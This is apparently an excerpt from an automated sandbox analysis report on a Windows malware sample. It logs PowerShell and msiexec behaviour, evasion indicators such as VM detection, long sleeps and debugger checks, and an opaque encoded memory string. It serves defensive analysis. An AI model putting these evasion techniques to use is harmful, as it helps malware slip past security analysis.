              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6872Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2902Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7646Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1932Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.9 %
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
              Source: C:\Windows\System32\wscript.exe TID: 7476Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6380Thread sleep count: 119 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6380Thread sleep time: -357000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6380Thread sleep count: 9860 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6380Thread sleep time: -29580000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_209010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_209010F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_20906580 FindFirstFileExA,7_2_20906580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00418981 memset,GetSystemInfo,11_2_00418981
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000002.00000002.1487804584.000001C4E67C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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
              Source: wscript.exe, 00000000.00000002.1356895387.0000023D99824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
              Source: wscript.exe, 00000000.00000003.1354500084.0000023D97861000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000000.00000002.1356378419.0000023D97867000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: wscript.exe, 00000000.00000003.1354005111.0000023D99824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1344006015.0000023D99824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354712379.0000023D97873000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354433204.0000023D97872000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343400870.0000023D99824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356895387.0000023D99824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343793550.0000023D9784B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356419474.0000023D97873000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634220952.0000000005009000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhv528A.tmp.11.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: wscript.exe, 00000000.00000002.1356895387.0000023D99824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicshutdownvmicshutdownUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemFRONTDESK-PCvmicshutdown
              Source: powershell.exe, 00000002.00000002.1531059954.000001C4FCFD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCe}
              Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_12-34016
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04C28860 LdrInitializeThunk,4_2_04C28860
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_209060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_209060E2
